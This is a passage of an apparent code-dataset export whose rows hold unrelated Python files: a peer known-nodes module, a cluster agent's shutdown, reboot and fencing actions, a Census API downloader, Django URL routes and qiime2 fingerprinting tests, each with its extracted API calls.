4871), True, 'import matplotlib.pyplot as plt\\n'), ((4876, 4896), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\\n', (4887, 4896), True, 'import matplotlib.pyplot as plt\\n'), ((4976, 5101), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': 
'\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_imgs_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (4986, 5101), True, 'import matplotlib.pyplot as plt\\n'), ((5105, 5115), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (5113, 5115), True, 'import matplotlib.pyplot as plt\\n'), ((5312, 5339), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\\n', (5322, 5339), True, 'import matplotlib.pyplot as plt\\n'), ((6760, 6770), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (6768, 6770), True, 'import matplotlib.pyplot as plt\\n'), ((4280, 4369), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '\"\"\"r\"\"\"', 'fc': '\"\"\"none\"\"\"'}), \"((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\\n fc='none')\\n\", (4308, 4369), False, 'import matplotlib\\n'), ((5527, 5556), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(10)', 'i_subplot'], {}), '(1, 10, i_subplot)\\n', (5538, 5556), True, 'import matplotlib.pyplot as plt\\n'), ((5621, 5747), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.test_imgs[i]'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(self.test_imgs[i], cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (5631, 5747), True, 'import matplotlib.pyplot as plt\\n'), ((676, 735), 'numpy.random.randint', 'np.random.randint', (['min_object_size', 'max_object_size'], {'size': '(2)'}), '(min_object_size, max_object_size, size=2)\\n', (693, 735), True, 'import numpy as np\\n'), ((756, 792), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.WIDTH - w)'], {}), '(0, self.WIDTH - w)\\n', (773, 792), True, 'import numpy as np\\n'), ((813, 850), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.HEIGHT - h)'], {}), '(0, self.HEIGHT - h)\\n', (830, 850), True, 'import numpy as np\\n'), ((1850, 1859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (1857, 1859), True, 'import matplotlib.pyplot as plt\\n'), ((2086, 2095), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (2093, 2095), True, 'import matplotlib.pyplot as plt\\n'), ((3811, 3900), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '\"\"\"r\"\"\"', 'fc': '\"\"\"none\"\"\"'}), \"((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\\n fc='none')\\n\", (3839, 3900), False, 'import matplotlib\\n'), ((4260, 4269), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (4267, 4269), True, 'import matplotlib.pyplot as plt\\n'), ((4669, 4678), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (4676, 4678), True, 'import matplotlib.pyplot as plt\\n'), ((4905, 4914), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (4912, 4914), True, 'import matplotlib.pyplot as plt\\n'), ((3791, 3800), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (3798, 3800), True, 'import matplotlib.pyplot as plt\\n'), ((3910, 3919), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (3917, 3919), True, 'import matplotlib.pyplot as plt\\n'), ((6151, 6260), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(pred_bbox[0], pred_bbox[1])', 'pred_bbox[2]', 'pred_bbox[3]'], {'ec': '\"\"\"r\"\"\"', 'fc': 
'\"\"\"none\"\"\"'}), \"((pred_bbox[0], pred_bbox[1]), pred_bbox[2],\\n pred_bbox[3], ec='r', fc='none')\\n\", (6179, 6260), False, 'import matplotlib\\n'), ((6314, 6419), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(exp_bbox[0], exp_bbox[1])', 'exp_bbox[2]', 'exp_bbox[3]'], {'ec': '\"\"\"b\"\"\"', 'fc': '\"\"\"none\"\"\"'}), \"((exp_bbox[0], exp_bbox[1]), exp_bbox[2],\\n exp_bbox[3], ec='b', fc='none')\\n\", (6342, 6419), False, 'import matplotlib\\n'), ((6131, 6140), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (6138, 6140), True, 'import matplotlib.pyplot as plt\\n'), ((6294, 6303), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (6301, 6303), True, 'import matplotlib.pyplot as plt\\n'), ((6658, 6667), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (6665, 6667), True, 'import matplotlib.pyplot as plt\\n')]"}}},{"rowIdx":776,"cells":{"code":{"kind":"string","value":"import pickle\nimport threading\n\nfrom bmconfigparser import BMConfigParser\nimport state\n\nknownNodesLock = threading.Lock()\nknownNodes = {}\n\nknownNodesTrimAmount = 2000\n\ndef saveKnownNodes(dirName = None):\n if dirName is None:\n dirName = state.appdata\n with knownNodesLock:\n with open(dirName + 'knownnodes.dat', 'wb') as output:\n pickle.dump(knownNodes, output)\n\ndef increaseRating(peer):\n increaseAmount = 0.1\n maxRating = 1\n with knownNodesLock:\n for stream in knownNodes.keys():\n try:\n knownNodes[stream][peer][\"rating\"] = min(knownNodes[stream][peer][\"rating\"] + increaseAmount, maxRating)\n except KeyError:\n pass\n\ndef decreaseRating(peer):\n decreaseAmount = 0.1\n minRating = -1\n with knownNodesLock:\n for stream in knownNodes.keys():\n try:\n knownNodes[stream][peer][\"rating\"] = max(knownNodes[stream][peer][\"rating\"] - decreaseAmount, minRating)\n except KeyError:\n pass\n\ndef trimKnownNodes(recAddrStream = 1):\n if len(knownNodes[recAddrStream]) < BMConfigParser().get(\"knownnodes\", \"maxnodes\"):\n return\n with knownNodesLock:\n oldestList = sorted(knownNodes[recAddrStream], key=lambda x: x['lastseen'])[:knownNodesTrimAmount]\n for oldest in oldestList:\n del knownNodes[recAddrStream][oldest]\n"},"apis":{"kind":"list like","value":["bmconfigparser.BMConfigParser","threading.Lock","pickle.dump"],"string":"[\n \"bmconfigparser.BMConfigParser\",\n \"threading.Lock\",\n \"pickle.dump\"\n]"},"extract_api":{"kind":"string","value":"[((105, 121), 'threading.Lock', 'threading.Lock', ([], {}), '()\\n', (119, 121), False, 'import threading\\n'), ((360, 391), 'pickle.dump', 'pickle.dump', (['knownNodes', 'output'], {}), '(knownNodes, output)\\n', (371, 391), False, 'import pickle\\n'), ((1121, 1137), 'bmconfigparser.BMConfigParser', 'BMConfigParser', ([], {}), '()\\n', (1135, 1137), False, 'from bmconfigparser import BMConfigParser\\n')]"}}},{"rowIdx":777,"cells":{"code":{"kind":"string","value":"# Copyright (c) 2018 DDN. 
All rights reserved.\n# Use of this source code is governed by a MIT-style\n# license that can be found in the LICENSE file.\n\n\nimport os\n\nfrom chroma_agent.lib.shell import AgentShell\nfrom chroma_agent.log import console_log\nfrom chroma_agent.device_plugins.action_runner import CallbackAfterResponse\nfrom chroma_agent.lib.pacemaker import PacemakerConfig\n\n\ndef ssi(runlevel):\n # force a manual failover by failing a node\n AgentShell.try_run([\"sync\"])\n AgentShell.try_run([\"sync\"])\n AgentShell.try_run([\"init\", runlevel])\n\n\ndef fail_node():\n ssi(\"0\")\n\n\ndef stonith(node):\n p_cfg = PacemakerConfig()\n\n # TODO: signal that manager that a STONITH has been done so that it\n # doesn't treat it as an AWOL\n console_log.info(\"Rebooting %s per a STONITH request\" % node)\n\n p_cfg.get_node(node).fence_reboot()\n\n\ndef shutdown_server(halt=True, at_time=\"now\"):\n def _shutdown():\n console_log.info(\"Initiating server shutdown per manager request\")\n # This will initiate a \"nice\" shutdown with a wall from root, etc.\n AgentShell.try_run([\"shutdown\", \"-H\" if halt else \"-h\", at_time])\n\n console_log.info(\"Terminating\")\n os._exit(0)\n\n raise CallbackAfterResponse(None, _shutdown)\n\n\ndef reboot_server(at_time=\"now\"):\n def _reboot():\n console_log.info(\"Initiating server reboot per manager request\")\n # reboot(8) just calls shutdown anyhow.\n AgentShell.try_run([\"shutdown\", \"-r\", at_time])\n\n console_log.info(\"Terminating\")\n os._exit(0)\n\n raise CallbackAfterResponse(None, _reboot)\n\n\nACTIONS = [reboot_server, shutdown_server, fail_node, stonith]\n"},"apis":{"kind":"list like","value":["chroma_agent.lib.shell.AgentShell.try_run","chroma_agent.lib.pacemaker.PacemakerConfig","os._exit","chroma_agent.log.console_log.info","chroma_agent.device_plugins.action_runner.CallbackAfterResponse"],"string":"[\n \"chroma_agent.lib.shell.AgentShell.try_run\",\n \"chroma_agent.lib.pacemaker.PacemakerConfig\",\n \"os._exit\",\n \"chroma_agent.log.console_log.info\",\n \"chroma_agent.device_plugins.action_runner.CallbackAfterResponse\"\n]"},"extract_api":{"kind":"string","value":"[((453, 481), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['sync']\"], {}), \"(['sync'])\\n\", (471, 481), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((486, 514), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['sync']\"], {}), \"(['sync'])\\n\", (504, 514), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((519, 557), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['init', runlevel]\"], {}), \"(['init', runlevel])\\n\", (537, 557), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((623, 640), 'chroma_agent.lib.pacemaker.PacemakerConfig', 'PacemakerConfig', ([], {}), '()\\n', (638, 640), False, 'from chroma_agent.lib.pacemaker import PacemakerConfig\\n'), ((758, 819), 'chroma_agent.log.console_log.info', 'console_log.info', ([\"('Rebooting %s per a STONITH request' % node)\"], {}), \"('Rebooting %s per a STONITH request' % node)\\n\", (774, 819), False, 'from chroma_agent.log import console_log\\n'), ((1227, 1265), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_shutdown'], {}), '(None, _shutdown)\\n', (1248, 1265), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\\n'), ((1570, 1606), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', 
'_reboot'], {}), '(None, _reboot)\\n', (1591, 1606), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\\n'), ((939, 1005), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Initiating server shutdown per manager request\"\"\"'], {}), \"('Initiating server shutdown per manager request')\\n\", (955, 1005), False, 'from chroma_agent.log import console_log\\n'), ((1089, 1154), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['shutdown', '-H' if halt else '-h', at_time]\"], {}), \"(['shutdown', '-H' if halt else '-h', at_time])\\n\", (1107, 1154), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((1164, 1195), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Terminating\"\"\"'], {}), \"('Terminating')\\n\", (1180, 1195), False, 'from chroma_agent.log import console_log\\n'), ((1204, 1215), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\\n', (1212, 1215), False, 'import os\\n'), ((1329, 1393), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Initiating server reboot per manager request\"\"\"'], {}), \"('Initiating server reboot per manager request')\\n\", (1345, 1393), False, 'from chroma_agent.log import console_log\\n'), ((1450, 1497), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['shutdown', '-r', at_time]\"], {}), \"(['shutdown', '-r', at_time])\\n\", (1468, 1497), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((1507, 1538), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Terminating\"\"\"'], {}), \"('Terminating')\\n\", (1523, 1538), False, 'from chroma_agent.log import console_log\\n'), ((1547, 1558), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\\n', (1555, 1558), False, 'import os\\n')]"}}},{"rowIdx":778,"cells":{"code":{"kind":"string","value":"#! /usr/bin/env python\n# -*- coding: utf-8 -*\n\"\"\"\nA base class that governs how to download and process tables from a Census API table.\n\"\"\"\nimport os\nimport logging\nimport pathlib\nfrom . import geotypes\nfrom . import decorators\nlogger = logging.getLogger(__name__)\n\n\nclass BaseTableConfig(object):\n \"\"\"\n Configures how to download and process tables from the Census API.\n \"\"\"\n THIS_DIR = pathlib.Path(__file__).parent\n PARENT_DIR = THIS_DIR.parent\n # All available years\n YEAR_LIST = [\n 2017,\n 2016,\n 2015,\n 2014,\n 2013,\n 2012,\n 2011,\n 2010,\n 2009\n ]\n # All available geographies\n GEOTYPE_LIST = (\n \"nationwide\",\n \"regions\",\n \"divisions\",\n \"states\",\n \"congressional_districts\",\n \"state_legislative_upper_districts\",\n \"state_legislative_lower_districts\",\n \"counties\",\n \"places\",\n \"urban_areas\",\n \"msas\",\n \"csas\",\n \"pumas\",\n \"nectas\",\n \"cnectas\",\n \"aiannh_homelands\",\n \"tracts\",\n \"zctas\",\n \"unified_school_districts\",\n \"elementary_school_districts\",\n \"secondary_school_districts\"\n )\n\n def __init__(\n self,\n api_key=None,\n source=\"acs5\",\n years=None,\n data_dir=None,\n force=False\n ):\n \"\"\"\n Configuration.\n \"\"\"\n # Set the inputs\n self.CENSUS_API_KEY = os.getenv(\"CENSUS_API_KEY\", api_key)\n if not self.CENSUS_API_KEY:\n raise NotImplementedError(\"Census API key required. 
Pass it as the first argument.\")\n self.source = source\n self.force = force\n\n #\n # Allow custom years for data download, defaulting to most recent year\n #\n\n # If they want all the years, give it to them.\n if years == \"all\":\n self.years_to_download = self.YEAR_LIST\n # If the user provides a year give them that.\n elif isinstance(years, int):\n self.years_to_download = [years]\n # Or if they provide years as a list, give those then.\n elif isinstance(years, list):\n self.years_to_download = list(map(int, years))\n # If they provided nothing, default to the latest year of data\n elif years is None:\n self.years_to_download = [max(self.YEAR_LIST), ]\n\n # Validate the years\n for year in self.years_to_download:\n if year not in self.YEAR_LIST:\n error_msg = (\"Data only available for the years\"\n f\"{self.YEAR_LIST[-1]}-{self.YEAR_LIST[0]}.\")\n raise NotImplementedError(error_msg)\n\n # Set the data directories\n if data_dir:\n self.data_dir = pathlib.Path(str(data_dir))\n else:\n self.data_dir = self.PARENT_DIR.joinpath(\"data\")\n self.raw_data_dir = self.data_dir.joinpath(\"raw\")\n self.processed_data_dir = self.data_dir.joinpath(\"processed\")\n\n # Make sure they exist\n if not self.data_dir.exists():\n self.data_dir.mkdir()\n if not self.raw_data_dir.exists():\n self.raw_data_dir.mkdir()\n if not self.processed_data_dir.exists():\n self.processed_data_dir.mkdir()\n\n @property\n def censusreporter_url(self):\n \"\"\"\n Returns the URL of the Census Reporter page explaining the ACS table.\n \"\"\"\n return f\"https://censusreporter.org/tables/{self.RAW_TABLE_NAME}/\"\n\n #\n # Geotype downloaders\n #\n\n @decorators.downloader\n def download_nationwide(self):\n \"\"\"\n Download nationwide data.\n \"\"\"\n return geotypes.NationwideDownloader\n\n @decorators.downloader\n def download_regions(self):\n \"\"\"\n Download data for all regions.\n \"\"\"\n return geotypes.RegionsDownloader\n\n @decorators.downloader\n def download_divisions(self):\n \"\"\"\n Download data for all divisions.\n \"\"\"\n return geotypes.DivisionsDownloader\n\n @decorators.downloader\n def download_states(self):\n \"\"\"\n Download data for all states.\n \"\"\"\n return geotypes.StatesDownloader\n\n @decorators.downloader\n def download_congressional_districts(self):\n \"\"\"\n Download data for all Congressional districts.\n \"\"\"\n return geotypes.CongressionalDistrictsDownloader\n\n @decorators.downloader\n def download_state_legislative_upper_districts(self):\n \"\"\"\n Download data for all Census upper legislative districts in the provided state.\n \"\"\"\n return geotypes.StateLegislativeUpperDistrictsDownloader\n\n @decorators.downloader\n def download_state_legislative_lower_districts(self):\n \"\"\"\n Download data for all Census lower legislative districts in the provided state.\n \"\"\"\n return geotypes.StateLegislativeLowerDistrictsDownloader\n\n @decorators.downloader\n def download_counties(self):\n \"\"\"\n Download data for all counties.\n \"\"\"\n return geotypes.CountiesDownloader\n\n @decorators.downloader\n def download_places(self):\n \"\"\"\n Download data for all Census designated places.\n \"\"\"\n return geotypes.PlacesDownloader\n\n @decorators.downloader\n def download_urban_areas(self):\n \"\"\"\n Download data for all urban areas\n \"\"\"\n return geotypes.UrbanAreasDownloader\n\n @decorators.downloader\n def download_msas(self):\n \"\"\"\n Download data for Metropolitian Statistical Areas.\n \"\"\"\n return geotypes.MsasDownloader\n\n @decorators.downloader\n def 
download_csas(self):\n \"\"\"\n Download data for Combined Statistical Areas.\n \"\"\"\n return geotypes.CsasDownloader\n\n @decorators.downloader\n def download_pumas(self):\n \"\"\"\n Download data for Public Use Microdata Areas.\n \"\"\"\n return geotypes.PumasDownloader\n\n @decorators.downloader\n def download_nectas(self):\n \"\"\"\n Download data for New England cities and towns.\n \"\"\"\n return geotypes.NectasDownloader\n\n @decorators.downloader\n def download_cnectas(self):\n \"\"\"\n Download data for combined New England cities and towns.\n \"\"\"\n return geotypes.CnectasDownloader\n\n @decorators.downloader\n def download_aiannh_homelands(self):\n \"\"\"\n Download data for American Indian home lands.\n \"\"\"\n return geotypes.AiannhHomelandsDownloader\n\n @decorators.downloader\n def download_tracts(self):\n \"\"\"\n Download data for all Census tracts in the provided state.\n \"\"\"\n return geotypes.TractsDownloader\n\n @decorators.downloader\n def download_zctas(self):\n \"\"\"\n Download data for Zip Code Tabulation Areas\n \"\"\"\n return geotypes.ZctasDownloader\n\n @decorators.downloader\n def download_unified_school_districts(self):\n \"\"\"\n Download data for unified school districts.\n \"\"\"\n return geotypes.UnifiedSchoolDistrictsDownloader\n\n @decorators.downloader\n def download_elementary_school_districts(self):\n \"\"\"\n Download data for elementary school districts.\n \"\"\"\n return geotypes.ElementarySchoolDistrictsDownloader\n\n @decorators.downloader\n def download_secondary_school_districts(self):\n \"\"\"\n Download data for secondary school districts.\n \"\"\"\n return geotypes.SecondarySchoolDistrictsDownloader\n\n def download_everything(self):\n \"\"\"\n Download 'em all.\n \"\"\"\n for geo in self.GEOTYPE_LIST:\n print(geo)\n # Get the downloader function\n dl = getattr(self, f\"download_{geo}\", None)\n # Validate it\n if not dl or not callable(dl):\n raise NotImplementedError(f\"Invalid geography type: {geo}\")\n # Run it\n try:\n dl()\n except NotImplementedError:\n pass\n"},"apis":{"kind":"list like","value":["logging.getLogger","os.getenv","pathlib.Path"],"string":"[\n \"logging.getLogger\",\n \"os.getenv\",\n \"pathlib.Path\"\n]"},"extract_api":{"kind":"string","value":"[((237, 264), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\\n', (254, 264), False, 'import logging\\n'), ((400, 422), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\\n', (412, 422), False, 'import pathlib\\n'), ((1474, 1510), 'os.getenv', 'os.getenv', (['\"\"\"CENSUS_API_KEY\"\"\"', 'api_key'], {}), \"('CENSUS_API_KEY', api_key)\\n\", (1483, 1510), False, 'import os\\n')]"}}},{"rowIdx":779,"cells":{"code":{"kind":"string","value":"from django.conf.urls import include, url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^settings$', views.household_dashboard, name='household_dashboard'),\n url(r'^myinfo$', views.my_info, name='my_info'),\n url(r'^profile$', views.household_profile, name='maintain_household'),\n url(r'^members$', views.household_members, name='maintain_members'),\n url(r'^vehicles$', views.household_vehicles, name='maintain_vehicles'),\n url(r'^ajax/models-by-make/(?P\\d+)/$', views.ajax_models_by_make),\n url(r'^ajax/makes-by-type/(?P\\d+)/$', views.ajax_makes_by_type),\n url(r'^ajax/add-make/(?P\\d+)/(?P[\\w ]{1,50})/$', views.ajax_add_make),\n url(r'^ajax/add-model/(?P\\d+)/(?P[\\w -]{1,128})/$', views.ajax_add_model),\n url(r'^ajax/delete-invite/$', views.ajax_delete_invite),\n url(r'^ajax/change-member-status/$', views.ajax_change_member_status),\n]\n"},"apis":{"kind":"list like","value":["django.conf.urls.url"],"string":"[\n \"django.conf.urls.url\"\n]"},"extract_api":{"kind":"string","value":"[((83, 155), 'django.conf.urls.url', 'url', (['\"\"\"^settings$\"\"\"', 'views.household_dashboard'], {'name': '\"\"\"household_dashboard\"\"\"'}), \"('^settings$', views.household_dashboard, name='household_dashboard')\\n\", (86, 155), False, 'from django.conf.urls import include, url\\n'), ((162, 208), 'django.conf.urls.url', 'url', (['\"\"\"^myinfo$\"\"\"', 'views.my_info'], {'name': '\"\"\"my_info\"\"\"'}), \"('^myinfo$', views.my_info, name='my_info')\\n\", (165, 208), False, 'from django.conf.urls import include, url\\n'), ((215, 283), 'django.conf.urls.url', 'url', (['\"\"\"^profile$\"\"\"', 'views.household_profile'], {'name': '\"\"\"maintain_household\"\"\"'}), \"('^profile$', views.household_profile, name='maintain_household')\\n\", (218, 283), False, 'from django.conf.urls import include, url\\n'), ((290, 356), 'django.conf.urls.url', 'url', (['\"\"\"^members$\"\"\"', 'views.household_members'], {'name': '\"\"\"maintain_members\"\"\"'}), \"('^members$', views.household_members, name='maintain_members')\\n\", (293, 356), False, 'from django.conf.urls import include, url\\n'), ((363, 432), 'django.conf.urls.url', 'url', (['\"\"\"^vehicles$\"\"\"', 'views.household_vehicles'], {'name': '\"\"\"maintain_vehicles\"\"\"'}), \"('^vehicles$', views.household_vehicles, name='maintain_vehicles')\\n\", (366, 432), False, 'from django.conf.urls import include, url\\n'), ((439, 513), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/models-by-make/(?P\\\\\\\\d+)/$\"\"\"', 'views.ajax_models_by_make'], {}), \"('^ajax/models-by-make/(?P\\\\\\\\d+)/$', views.ajax_models_by_make)\\n\", (442, 513), False, 'from django.conf.urls import include, url\\n'), ((519, 591), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/makes-by-type/(?P\\\\\\\\d+)/$\"\"\"', 'views.ajax_makes_by_type'], {}), \"('^ajax/makes-by-type/(?P\\\\\\\\d+)/$', views.ajax_makes_by_type)\\n\", (522, 591), False, 'from django.conf.urls import include, url\\n'), ((597, 688), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/add-make/(?P\\\\\\\\d+)/(?P[\\\\\\\\w ]{1,50})/$\"\"\"', 'views.ajax_add_make'], {}), \"('^ajax/add-make/(?P\\\\\\\\d+)/(?P[\\\\\\\\w ]{1,50})/$', views.\\n ajax_add_make)\\n\", (600, 688), False, 'from django.conf.urls import include, url\\n'), ((688, 784), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/add-model/(?P\\\\\\\\d+)/(?P[\\\\\\\\w -]{1,128})/$\"\"\"', 'views.ajax_add_model'], {}), \"('^ajax/add-model/(?P\\\\\\\\d+)/(?P[\\\\\\\\w -]{1,128})/$', views\\n .ajax_add_model)\\n\", (691, 784), False, 'from django.conf.urls import include, url\\n'), ((784, 838), 'django.conf.urls.url', 
'url', (['\"\"\"^ajax/delete-invite/$\"\"\"', 'views.ajax_delete_invite'], {}), \"('^ajax/delete-invite/$', views.ajax_delete_invite)\\n\", (787, 838), False, 'from django.conf.urls import include, url\\n'), ((845, 913), 'django.conf.urls.url', 'url', (['\"\"\"^ajax/change-member-status/$\"\"\"', 'views.ajax_change_member_status'], {}), \"('^ajax/change-member-status/$', views.ajax_change_member_status)\\n\", (848, 913), False, 'from django.conf.urls import include, url\\n')]"}}},{"rowIdx":780,"cells":{"code":{"kind":"string","value":"# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2018, QIIME 2 development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nfrom unittest import TestCase, main\nimport qiime2\nimport os\nfrom q2_qemistree import MGFDirFmt, SiriusDirFmt, ZodiacDirFmt, OutputDirs\nfrom q2_qemistree import (compute_fragmentation_trees,\n rerank_molecular_formulas,\n predict_fingerprints)\nfrom q2_qemistree._fingerprint import artifactory\n\n\nclass FingerprintTests(TestCase):\n def setUp(self):\n THIS_DIR = os.path.dirname(os.path.abspath(__file__))\n self.badsirpath = os.path.join(THIS_DIR, 'data/foo/bin')\n self.goodsirpath = os.path.join(THIS_DIR, 'data/'\n 'sirius-linux64-headless-4.0.1/bin')\n # MassSpectrometryFeatures\n self.ions = qiime2.Artifact.load(os.path.join(THIS_DIR,\n 'data/sirius.mgf.qza'))\n # SiriusFolder\n self.sirout = qiime2.Artifact.load(os.path.join(THIS_DIR,\n 'data/sirFolder.qza'))\n # ZodiacFolder\n self.zodout = qiime2.Artifact.load(os.path.join(THIS_DIR,\n 'data/zodFolder.qza'))\n\n def test_artifactory(self):\n # everything is working fine\n obs = os.environ.get('_JAVA_OPTIONS', '')\n res = artifactory(self.goodsirpath, ['--help'],\n constructor=OutputDirs, java_flags='-Xms2G')\n self.assertEqual(obs, os.environ.get('_JAVA_OPTIONS'))\n self.assertTrue(isinstance(res, OutputDirs))\n # exceptions are raised\n with self.assertRaises(OSError):\n res = artifactory(self.badsirpath, ['--help'],\n constructor=OutputDirs)\n\n def test_fragmentation_trees(self):\n ions = self.ions.view(MGFDirFmt)\n result = compute_fragmentation_trees(sirius_path=self.goodsirpath,\n features=ions,\n ppm_max=15, profile='orbitrap')\n contents = os.listdir(result.get_path())\n self.assertTrue(('version.txt' in contents))\n\n def test_fragmentation_trees_negative_ionization(self):\n ions = self.ions.view(MGFDirFmt)\n result = compute_fragmentation_trees(sirius_path=self.goodsirpath,\n features=ions,\n ppm_max=15, profile='orbitrap',\n ionization_mode='negative')\n contents = os.listdir(result.get_path())\n self.assertTrue(('version.txt' in contents))\n\n def test_fragmentation_trees_exception(self):\n ions = self.ions.view(MGFDirFmt)\n with self.assertRaises(ValueError):\n compute_fragmentation_trees(sirius_path=self.goodsirpath,\n features=ions,\n ppm_max=15,\n profile='orbitrap',\n ionization_mode='n3gativ3')\n\n def test_reranking(self):\n ions = self.ions.view(MGFDirFmt)\n sirout = self.sirout.view(SiriusDirFmt)\n result = rerank_molecular_formulas(sirius_path=self.goodsirpath,\n fragmentation_trees=sirout,\n features=ions)\n contents = os.listdir(result.get_path())\n self.assertTrue(('zodiac_summary.csv' in contents))\n\n def test_fingerid(self):\n zodout = self.zodout.view(ZodiacDirFmt)\n result = 
predict_fingerprints(sirius_path=self.goodsirpath,\n molecular_formulas=zodout, ppm_max=15)\n contents = os.listdir(result.get_path())\n self.assertTrue(('summary_csi_fingerid.csv' in contents))\n\n\nif __name__ == '__main__':\n main()\n"},"apis":{"kind":"list like","value":["q2_qemistree.rerank_molecular_formulas","os.path.join","os.environ.get","q2_qemistree.predict_fingerprints","q2_qemistree.compute_fragmentation_trees","unittest.main","q2_qemistree._fingerprint.artifactory","os.path.abspath"],"string":"[\n \"q2_qemistree.rerank_molecular_formulas\",\n \"os.path.join\",\n \"os.environ.get\",\n \"q2_qemistree.predict_fingerprints\",\n \"q2_qemistree.compute_fragmentation_trees\",\n \"unittest.main\",\n \"q2_qemistree._fingerprint.artifactory\",\n \"os.path.abspath\"\n]"},"extract_api":{"kind":"string","value":"[((4200, 4206), 'unittest.main', 'main', ([], {}), '()\\n', (4204, 4206), False, 'from unittest import TestCase, main\\n'), ((836, 874), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/foo/bin\"\"\"'], {}), \"(THIS_DIR, 'data/foo/bin')\\n\", (848, 874), False, 'import os\\n'), ((902, 966), 'os.path.join', 'os.path.join', (['THIS_DIR', '\"\"\"data/sirius-linux64-headless-4.0.1/bin\"\"\"'], {}), \"(THIS_DIR, 'data/sirius-linux64-headless-4.0.1/bin')\\n\", (914, 966), False, 'import os\\n'), ((1607, 1642), 'os.environ.get', 'os.environ.get', (['\"\"\"_JAVA_OPTIONS\"\"\"', '\"\"\"\"\"\"'], {}), \"('_JAVA_OPTIONS', '')\\n\", (1621, 1642), False, 'import os\\n'), ((1657, 1747), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.goodsirpath', \"['--help']\"], {'constructor': 'OutputDirs', 'java_flags': '\"\"\"-Xms2G\"\"\"'}), \"(self.goodsirpath, ['--help'], constructor=OutputDirs,\\n java_flags='-Xms2G')\\n\", (1668, 1747), False, 'from q2_qemistree._fingerprint import artifactory\\n'), ((2171, 2279), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '\"\"\"orbitrap\"\"\"'}), \"(sirius_path=self.goodsirpath, features=ions,\\n ppm_max=15, profile='orbitrap')\\n\", (2198, 2279), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\\n'), ((2587, 2723), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 